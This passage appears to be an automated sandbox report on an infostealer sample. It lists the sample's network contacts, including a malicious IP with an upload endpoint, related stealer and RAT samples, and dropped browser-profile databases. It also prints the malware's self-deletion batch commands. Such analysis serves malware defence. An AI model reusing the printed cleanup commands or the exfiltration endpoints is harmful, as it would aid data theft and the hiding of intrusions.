http://icanhazip.com | 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tmpF56F.tmp.dat.0.dr | false | | high
https://gemini.google.com/app?q= | tmpF56F.tmp.dat.0.dr | false | | high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
89.23.100.233 | unknown | Russian Federation | | 48687 | MAXITEL-ASRU | true
104.16.185.241 | icanhazip.com | United States | | 13335 | CLOUDFLARENETUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1568316
                                      Start date and time:2024-12-04 14:49:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 0s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected VM Detection
                                      Number of analysed new started processes analysed:28
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:3K5MXGVOJE.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@25/20@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 217
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: 3K5MXGVOJE.exe
Time | Type | Description
08:54:02 | API Interceptor | 69x Sleep call for process: 3K5MXGVOJE.exe modified
08:54:13 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
89.23.100.233 | VaXmr82RIb.exe | Get hash | malicious | Unknown | Browse | 89.23.100.233:1488/upload
104.16.185.241 | K6aOw2Jmji.exe | Get hash | malicious | Stealerium | Browse | icanhazip.com/
104.16.185.241 | jpiWvvEcbp.exe | Get hash | malicious | Stealerium | Browse | icanhazip.com/
104.16.185.241 | VzhY4BcvBH.exe | Get hash | malicious | AsyncRAT, RedLine, StormKitty, VenomRAT | Browse | icanhazip.com/
104.16.185.241 | L814CyOxMT.exe | Get hash | malicious | Flesh Stealer, PureLog Stealer, zgRAT | Browse | icanhazip.com/
104.16.185.241 | GsZkXAmf61.exe | Get hash | malicious | Celestial Rat, EICAR | Browse | icanhazip.com/
104.16.185.241 | REQUEST FOR QUOTATION.js | Get hash | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | Browse | icanhazip.com/
104.16.185.241 | Company profile.js | Get hash | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | Browse | icanhazip.com/
104.16.185.241 | RFQ.vbs | Get hash | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | Browse | icanhazip.com/
104.16.185.241 | HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs | Get hash | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | Browse | icanhazip.com/
104.16.185.241 | System.exe | Get hash | malicious | Flesh Stealer, Xmrig | Browse | icanhazip.com/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
icanhazip.com | VaXmr82RIb.exe | Get hash | malicious | Unknown | Browse | 104.16.184.241
icanhazip.com | Pdf Reader.exe | Get hash | malicious | Stealerium | Browse | 104.16.184.241
icanhazip.com | gKWbina3a4.bat | Get hash | malicious | Stealerium | Browse | 104.16.184.241
icanhazip.com | K6aOw2Jmji.exe | Get hash | malicious | Stealerium | Browse | 104.16.185.241
icanhazip.com | uyz4YPUyc9.exe | Get hash | malicious | Stealerium | Browse | 104.16.184.241
icanhazip.com | yv7QsAR49V.exe | Get hash | malicious | Stealerium | Browse | 104.16.184.241
icanhazip.com | jpiWvvEcbp.exe | Get hash | malicious | Stealerium | Browse | 104.16.185.241
icanhazip.com | 5E3zWXveDN.exe | Get hash | malicious | Stealerium | Browse | 104.16.184.241
icanhazip.com | LKxcbzlwkz.exe | Get hash | malicious | AveMaria, KeyLogger, Stealerium | Browse | 104.16.184.241
icanhazip.com | VzhY4BcvBH.exe | Get hash | malicious | AsyncRAT, RedLine, StormKitty, VenomRAT | Browse | 104.16.185.241
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | https://www.aviatorsharkao.com.br/atuuss | Get hash | malicious | Unknown | Browse | 104.21.43.244
CLOUDFLARENETUS | file.exe | Get hash | malicious | Amadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, Vidar | Browse | 172.67.181.44
CLOUDFLARENETUS | RzLnOTy9k3.lnk | Get hash | malicious | LummaC Stealer | Browse | 172.67.209.252
CLOUDFLARENETUS | VaXmr82RIb.exe | Get hash | malicious | Unknown | Browse | 104.16.184.241
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.165.166
CLOUDFLARENETUS | QsEn4Jw9pY.lnk | Get hash | malicious | Unknown | Browse | 172.67.201.111
CLOUDFLARENETUS | https://cdn.tailwindcss.com | Get hash | malicious | Unknown | Browse | 104.22.21.144
CLOUDFLARENETUS | fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 172.67.177.134
CLOUDFLARENETUS | ylNk78QlB8.lnk | Get hash | malicious | Unknown | Browse | 172.67.201.111
CLOUDFLARENETUS | sF5nNt8usL.bat | Get hash | malicious | Unknown | Browse | 172.64.41.3
MAXITEL-ASRU | VaXmr82RIb.exe | Get hash | malicious | Unknown | Browse | 89.23.100.233
MAXITEL-ASRU | Installer_setup32_64x.exe | Get hash | malicious | LummaC, Stealc | Browse | 89.23.96.109
MAXITEL-ASRU | 9fGsCDYKLV.exe | Get hash | malicious | Flesh Stealer | Browse | 89.23.100.233
MAXITEL-ASRU | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer | Browse | 89.23.100.233
MAXITEL-ASRU | file.exe | Get hash | malicious | Flesh Stealer | Browse | 89.23.100.233
MAXITEL-ASRU | L814CyOxMT.exe | Get hash | malicious | Flesh Stealer, PureLog Stealer, zgRAT | Browse | 89.23.100.233
MAXITEL-ASRU | vbe11TPn2x.exe | Get hash | malicious | Flesh Stealer | Browse | 89.23.100.233
MAXITEL-ASRU | Ham9SAD0Ou.doc | Get hash | malicious | Unknown | Browse | 89.23.98.98
MAXITEL-ASRU | file.dll | Get hash | malicious | Matanbuchus | Browse | 89.23.113.220
MAXITEL-ASRU | file.dll | Get hash | malicious | Matanbuchus | Browse | 89.23.113.220
                                      No context
                                      No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.4428323511368455
                                      Encrypted:false
                                      SSDEEP:192:/MX0HMXm66nmWbk9auo75E6UVW/I2/FHdDu76cfAIO84:kX0+muWbk9al5EgVF9Du76cfAIO84
                                      MD5:6120592CFD2AB963685A3120C2F48874
                                      SHA1:2497DF4632CD907070EB91D7C800722AC0634DE2
                                      SHA-256:2B7DE7A1A7E545DC661AC79D18C0E8F4007FE1019091B1492BC2E2AF72477AC5
                                      SHA-512:B74996179D6C9AA7682A2AD8CE19CDE1F32B011B2827076E106923805CD1A9CC25CBB72E3A0E28256E6825C41D7E6C95F616F065393AB1CC072BAAD87B9C46B8
                                      Malicious:true
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.9.4.0.5.1.4.9.0.2.6.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.9.4.0.5.1.9.9.0.1.6.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.a.5.f.3.2.2.-.e.0.7.3.-.4.2.b.e.-.a.0.2.1.-.9.9.e.b.6.3.6.5.2.c.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.8.4.f.3.f.c.-.2.0.a.9.-.4.9.e.6.-.a.2.3.b.-.9.f.8.a.f.7.4.9.6.e.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.K.5.M.X.G.V.O.J.E...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.8.c.-.0.0.0.1.-.0.0.5.0.-.0.9.8.0.-.c.e.f.4.5.3.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.f.b.e.b.0.b.c.1.8.8.3.8.b.3.3.c.a.e.c.f.a.4.2.9.f.e.c.8.0.4.3.1.f.c.6.9.c.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Wed Dec 4 13:54:11 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):257628
                                      Entropy (8bit):4.359599809630461
                                      Encrypted:false
                                      SSDEEP:3072:SLvPz4uEqQZCyDnLTgkv367RjNsCazI2GkL:SLnz4DsyfTgkWgQk
                                      MD5:5EED49AA21B2FDD55A5F89078C475DC1
                                      SHA1:B446FF7DEF5D629A1369A041436886BE7BA3BB1A
                                      SHA-256:986E53AA29E2C720AFB49A827B0ACB0F507CF8E39D26F0F7D11C98644F2AA987
                                      SHA-512:82BE1D9F164827DF71E1F3542A2DB341188EDB14D01AC224B31EAC069855487B464391D763D3135F736A665FF796B57F156D9AF682343567D91F6DFA62B1D205
                                      Malicious:false
                                      Preview:MDMP..a..... ........_Pg............4............+..H.......<...,3.......%..*F..........`.......8...........T............u...x..........h3..........T5..............................................................................bJ.......5......GenuineIntel...........T............^Pg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8360
                                      Entropy (8bit):3.6845676555729203
                                      Encrypted:false
                                      SSDEEP:192:R9l7lZNij7696YgtSUeWgmfZ2P8pDG89bafsfA7em:R9lnNif696Y6SUXgmfkGaEfAb
                                      MD5:6546F52FCCFB47E8F0F33173FBE0E918
                                      SHA1:0F0FEDD11C3F2D2C1D19074E5D6F17A9CB6E5B5B
                                      SHA-256:5A647A15D9E89731870989424A5F0701A42C5E0EF60A8F9FD42549F7BD4D97B4
                                      SHA-512:0FFFF733FA10453F8E8BA028D9D0268D9E66005DAC2B2488982152629E6856F21C00023AFC25EC6A9EFDEEE6FA000AE4061A69A87EA023CE6F8C96B67F950597
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.3.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4865
                                      Entropy (8bit):4.493626843371195
                                      Encrypted:false
                                      SSDEEP:48:cvIwwtl8zs9e702I7VFJ5WS2Cfjk3s3rm8M4JyPhpRPlPFdVi+q8vtPhpRPlpX3H:uILfk7GySPfrJyPZPGKtPZPb3L9dFrd
                                      MD5:F4DCC1CEFACA5F49117EB7461D5C8E25
                                      SHA1:EC42CEC074D9E94EFAB65031DB86C035998505CF
                                      SHA-256:8C837BDD7FF60CFA71535661FC090D30AF2C7074D441E2F1BB3965772E78A5C6
                                      SHA-512:956E07A19A13B259C0A8F64A837E654135DF96A77FB3FEF424227ADAED8B4F90CA6483FA9C37249280329C6759ADEE22883F9EB43A94438C377BD92A079CF8B6
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222960425" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):103985
                                      Entropy (8bit):6.082865991437579
                                      Encrypted:false
                                      SSDEEP:1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
                                      MD5:6DE273C47E7F54F2910BC516F886633B
                                      SHA1:230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
                                      SHA-256:89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
                                      SHA-512:AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
                                      Malicious:false
                                      Preview:{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):15119
                                      Entropy (8bit):5.63468773874796
                                      Encrypted:false
                                      SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                      MD5:AFC16C019BBEB3904B37576B9179D9CD
                                      SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                      SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                      SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                      Malicious:false
                                      Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):107
                                      Entropy (8bit):5.254787898018293
                                      Encrypted:false
                                      SSDEEP:3:HFTEOuMJcFKsoD2lwBRZDEXEPONy+WWAi0Eyn:yOuMJN6lweonRWAi0Eyn
                                      MD5:FDE4BFB3ED2EBB9F21057EF819C7DA80
                                      SHA1:81070D679A244AE5756F3409A1D78720A8971CCA
                                      SHA-256:E9B43841C37785EC42C877E9F36967D92D9F5F8324B494D45DE94D47DD7E264E
                                      SHA-512:154EFA82EA323620E03BD2830565013DDFCFE2ABD02B1F02790D26E7949E82B5769783FDF8035FF86EC45FA80FBA37DABE470FDDB92D4B054415FA7DAE51FADC
                                      Malicious:false
                                      Preview:chcp 65001..TaskKill /F /IM 4236..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\3K5MXGVOJE.exe"..
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):98304
                                      Entropy (8bit):0.08231524779339361
                                      Encrypted:false
                                      SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                      MD5:886A5F9308577FDF19279AA582D0024D
                                      SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                      SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                      SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                      Category:dropped
                                      Size (bytes):294912
                                      Entropy (8bit):0.08434615749937499
                                      Encrypted:false
                                      SSDEEP:192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
                                      MD5:93BAA1B7500F3ADB16BE27FCB2E256A8
                                      SHA1:77CB640557F5F7950B083405B4AEE0573D11D98F
                                      SHA-256:7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
                                      SHA-512:C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):1.1414673161713362
                                      Encrypted:false
                                      SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                      MD5:24937DB267D854F3EF5453E2E54EA21B
                                      SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                      SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                      SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):1.1414673161713362
                                      Encrypted:false
                                      SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                      MD5:24937DB267D854F3EF5453E2E54EA21B
                                      SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                      SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                      SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):1.1414673161713362
                                      Encrypted:false
                                      SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                      MD5:24937DB267D854F3EF5453E2E54EA21B
                                      SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                      SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                      SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):57344
                                      Entropy (8bit):0.7310370201569906
                                      Encrypted:false
                                      SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                      MD5:A802F475CA2D00B16F45FEA728F2247C
                                      SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                      SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                      SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):1.0873605234887023
                                      Encrypted:false
                                      SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                      MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                      SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                      SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                      SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\3K5MXGVOJE.exe
